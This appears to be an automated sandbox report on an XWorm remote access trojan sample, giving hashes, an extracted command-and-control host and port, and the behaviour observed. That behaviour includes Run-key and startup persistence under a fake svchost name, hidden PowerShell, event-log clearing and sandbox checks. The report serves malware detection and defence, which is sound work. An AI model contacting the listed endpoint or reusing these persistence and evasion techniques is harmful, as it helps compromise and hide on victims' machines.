xworm | bbbd56026093c64936a368c723b12175330923741972d89c34699b77538d6e4c

Analysis

max time kernel
45s
max time network
72s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
21-01-2025 16:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VEN HEX.exe
Size

2.1MB
MD5

a697b45d558328d53b8f7c74268554f3
SHA1

430805b32e81d91994f33c2515ce79055433f9e2
SHA256

bbbd56026093c64936a368c723b12175330923741972d89c34699b77538d6e4c
SHA512

a1365c320abecc466bf3ca171ba0bfc75c477597b86268f825200fcf8255d430f189641b333002103dbe927960bbde75509636a7ca9224bd2ac503348874dc76
SSDEEP

49152:7e7JlfaddOPZc2gUpwUcDSBn9Iw+gGKRQ241PU:aTfkeBw3Y9Iw+gGK+1PU

Score

10^/10

xworm defense_evasion execution persistence rat trojan

Malware Config

Extracted

Family

xworm

shown-newspapers.gl.at.ply.gg:35343

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/2924-82-0x000001BD7AB00000-0x000001BD7AB1C000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
18	2924	powershell.exe
26	2924	powershell.exe
28	2924	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2924	powershell.exe
2420	powershell.exe
1752	powershell.exe
1684	powershell.exe
4848	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000\Control Panel\International\Geo\Nation	VEN HEX.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4936	VEN HEX.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	powershell.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C010CA0DBAE5"	svchost.exe

Modifies registry class 27 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133819497308603515"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133819497312353949"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ICT = "133819497373916062"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133812531128938038"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133819497374072665"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\Registry\User\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133819497305791360"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133819497380322165"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ITT = "133812531190709553"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133819497309853802"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133812531125812976"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133819497377510094"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3406519639-3774642266-3926631722-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy	svchost.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2924	powershell.exe
1684	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2420	powershell.exe
2420	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
1752	powershell.exe
1752	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
1752	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
1684	powershell.exe
1684	powershell.exe
1684	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3692	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
812	svchost.exe
812	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeAuditPrivilege	2852	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2408	svchost.exe
Token: SeIncreaseQuotaPrivilege	2408	svchost.exe
Token: SeSecurityPrivilege	2408	svchost.exe
Token: SeTakeOwnershipPrivilege	2408	svchost.exe
Token: SeLoadDriverPrivilege	2408	svchost.exe
Token: SeBackupPrivilege	2408	svchost.exe
Token: SeRestorePrivilege	2408	svchost.exe
Token: SeShutdownPrivilege	2408	svchost.exe
Token: SeSystemEnvironmentPrivilege	2408	svchost.exe
Token: SeManageVolumePrivilege	2408	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2408	svchost.exe
Token: SeIncreaseQuotaPrivilege	2408	svchost.exe
Token: SeSecurityPrivilege	2408	svchost.exe
Token: SeTakeOwnershipPrivilege	2408	svchost.exe
Token: SeLoadDriverPrivilege	2408	svchost.exe
Token: SeSystemtimePrivilege	2408	svchost.exe
Token: SeBackupPrivilege	2408	svchost.exe
Token: SeRestorePrivilege	2408	svchost.exe
Token: SeShutdownPrivilege	2408	svchost.exe
Token: SeSystemEnvironmentPrivilege	2408	svchost.exe
Token: SeUndockPrivilege	2408	svchost.exe
Token: SeManageVolumePrivilege	2408	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2408	svchost.exe
Token: SeIncreaseQuotaPrivilege	2408	svchost.exe
Token: SeSecurityPrivilege	2408	svchost.exe
Token: SeTakeOwnershipPrivilege	2408	svchost.exe
Token: SeLoadDriverPrivilege	2408	svchost.exe
Token: SeSystemtimePrivilege	2408	svchost.exe
Token: SeBackupPrivilege	2408	svchost.exe
Token: SeRestorePrivilege	2408	svchost.exe
Token: SeShutdownPrivilege	2408	svchost.exe
Token: SeSystemEnvironmentPrivilege	2408	svchost.exe
Token: SeUndockPrivilege	2408	svchost.exe
Token: SeManageVolumePrivilege	2408	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2408	svchost.exe
Token: SeIncreaseQuotaPrivilege	2408	svchost.exe
Token: SeSecurityPrivilege	2408	svchost.exe
Token: SeTakeOwnershipPrivilege	2408	svchost.exe
Token: SeLoadDriverPrivilege	2408	svchost.exe
Token: SeSystemtimePrivilege	2408	svchost.exe
Token: SeBackupPrivilege	2408	svchost.exe
Token: SeRestorePrivilege	2408	svchost.exe
Token: SeShutdownPrivilege	2408	svchost.exe
Token: SeSystemEnvironmentPrivilege	2408	svchost.exe
Token: SeUndockPrivilege	2408	svchost.exe
Token: SeManageVolumePrivilege	2408	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2408	svchost.exe
Token: SeIncreaseQuotaPrivilege	2408	svchost.exe
Token: SeSecurityPrivilege	2408	svchost.exe
Token: SeTakeOwnershipPrivilege	2408	svchost.exe
Token: SeLoadDriverPrivilege	2408	svchost.exe
Token: SeSystemtimePrivilege	2408	svchost.exe
Token: SeBackupPrivilege	2408	svchost.exe
Token: SeRestorePrivilege	2408	svchost.exe
Token: SeShutdownPrivilege	2408	svchost.exe
Token: SeSystemEnvironmentPrivilege	2408	svchost.exe
Token: SeUndockPrivilege	2408	svchost.exe
Token: SeManageVolumePrivilege	2408	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2408	svchost.exe
Token: SeIncreaseQuotaPrivilege	2408	svchost.exe
Token: SeSecurityPrivilege	2408	svchost.exe
Token: SeTakeOwnershipPrivilege	2408	svchost.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3692	Explorer.EXE
3692	Explorer.EXE
3692	Explorer.EXE

Suspicious use of SendNotifyMessage 5 IoCs

pid	Process
3692	Explorer.EXE
3692	Explorer.EXE
3692	Explorer.EXE
3692	Explorer.EXE
3692	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2924	powershell.exe
1684	POWERPNT.EXE
1684	POWERPNT.EXE
1684	POWERPNT.EXE
1684	POWERPNT.EXE
1684	POWERPNT.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3140 wrote to memory of 4936	3140	VEN HEX.exe	82
PID 3140 wrote to memory of 4936	3140	VEN HEX.exe	82
PID 3140 wrote to memory of 1204	3140	VEN HEX.exe	83
PID 3140 wrote to memory of 1204	3140	VEN HEX.exe	83
PID 1204 wrote to memory of 232	1204	cmd.exe	86
PID 1204 wrote to memory of 232	1204	cmd.exe	86
PID 1204 wrote to memory of 2924	1204	cmd.exe	87
PID 1204 wrote to memory of 2924	1204	cmd.exe	87
PID 2924 wrote to memory of 3692	2924	powershell.exe	57
PID 2924 wrote to memory of 776	2924	powershell.exe	14
PID 2924 wrote to memory of 968	2924	powershell.exe	12
PID 2924 wrote to memory of 1352	2924	powershell.exe	22
PID 2924 wrote to memory of 1744	2924	powershell.exe	30
PID 2924 wrote to memory of 3112	2924	powershell.exe	52
PID 2924 wrote to memory of 740	2924	powershell.exe	15
PID 2924 wrote to memory of 936	2924	powershell.exe	16
PID 2924 wrote to memory of 2708	2924	powershell.exe	45
PID 2924 wrote to memory of 3568	2924	powershell.exe	66
PID 2924 wrote to memory of 1320	2924	powershell.exe	67
PID 2924 wrote to memory of 2892	2924	powershell.exe	50
PID 2924 wrote to memory of 916	2924	powershell.exe	11
PID 2924 wrote to memory of 2884	2924	powershell.exe	49
PID 2924 wrote to memory of 1496	2924	powershell.exe	26
PID 2924 wrote to memory of 1296	2924	powershell.exe	21
PID 2924 wrote to memory of 2280	2924	powershell.exe	40
PID 2924 wrote to memory of 1688	2924	powershell.exe	29
PID 2924 wrote to memory of 3256	2924	powershell.exe	70
PID 2924 wrote to memory of 1088	2924	powershell.exe	18
PID 2924 wrote to memory of 1480	2924	powershell.exe	25
PID 2924 wrote to memory of 1672	2924	powershell.exe	28
PID 2924 wrote to memory of 1868	2924	powershell.exe	32
PID 2924 wrote to memory of 2852	2924	powershell.exe	48
PID 2924 wrote to memory of 476	2924	powershell.exe	13
PID 2924 wrote to memory of 2640	2924	powershell.exe	44
PID 2924 wrote to memory of 2044	2924	powershell.exe	36
PID 2924 wrote to memory of 1452	2924	powershell.exe	24
PID 2924 wrote to memory of 3808	2924	powershell.exe	58
PID 2924 wrote to memory of 3600	2924	powershell.exe	56
PID 2924 wrote to memory of 1432	2924	powershell.exe	23
PID 2924 wrote to memory of 1628	2924	powershell.exe	37
PID 2924 wrote to memory of 2020	2924	powershell.exe	35
PID 2924 wrote to memory of 2220	2924	powershell.exe	39
PID 2924 wrote to memory of 2408	2924	powershell.exe	42
PID 2924 wrote to memory of 1812	2924	powershell.exe	31
PID 2924 wrote to memory of 1220	2924	powershell.exe	20
PID 2924 wrote to memory of 2396	2924	powershell.exe	41
PID 2924 wrote to memory of 2000	2924	powershell.exe	34
PID 2924 wrote to memory of 4360	2924	powershell.exe	73
PID 2924 wrote to memory of 812	2924	powershell.exe	10
PID 2924 wrote to memory of 1992	2924	powershell.exe	33
PID 2924 wrote to memory of 1592	2924	powershell.exe	27
PID 2924 wrote to memory of 2772	2924	powershell.exe	46
PID 2924 wrote to memory of 3892	2924	powershell.exe	71
PID 2924 wrote to memory of 3352	2924	powershell.exe	55
PID 2924 wrote to memory of 1184	2924	powershell.exe	19
PID 2924 wrote to memory of 3036	2924	powershell.exe	91
PID 2924 wrote to memory of 2420	2924	powershell.exe	92
PID 2924 wrote to memory of 2420	2924	powershell.exe	92
PID 812 wrote to memory of 4236	812	svchost.exe	95
PID 812 wrote to memory of 4236	812	svchost.exe	95
PID 2924 wrote to memory of 1752	2924	powershell.exe	96
PID 2924 wrote to memory of 1752	2924	powershell.exe	96
PID 2924 wrote to memory of 1684	2924	powershell.exe	98
PID 2924 wrote to memory of 1684	2924	powershell.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:812
- C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  2⤵
  PID:4236
- C:\Windows\System32\mousocoreworker.exe
  C:\Windows\System32\mousocoreworker.exe -Embedding
  2⤵
  PID:3280
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:4396
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:3040
- C:\Windows\System32\smartscreen.exe
  C:\Windows\System32\smartscreen.exe -Embedding
  2⤵
  PID:4832
- C:\Windows\system32\BackgroundTaskHost.exe
  "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
  2⤵
  PID:2932
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:1284
- C:\Windows\system32\BackgroundTaskHost.exe
  "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
  2⤵
  PID:3304
- C:\Windows\system32\BackgroundTaskHost.exe
  "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
  2⤵
  PID:3052
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
  2⤵
  PID:3868
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
  2⤵
  PID:4544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1496

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1628

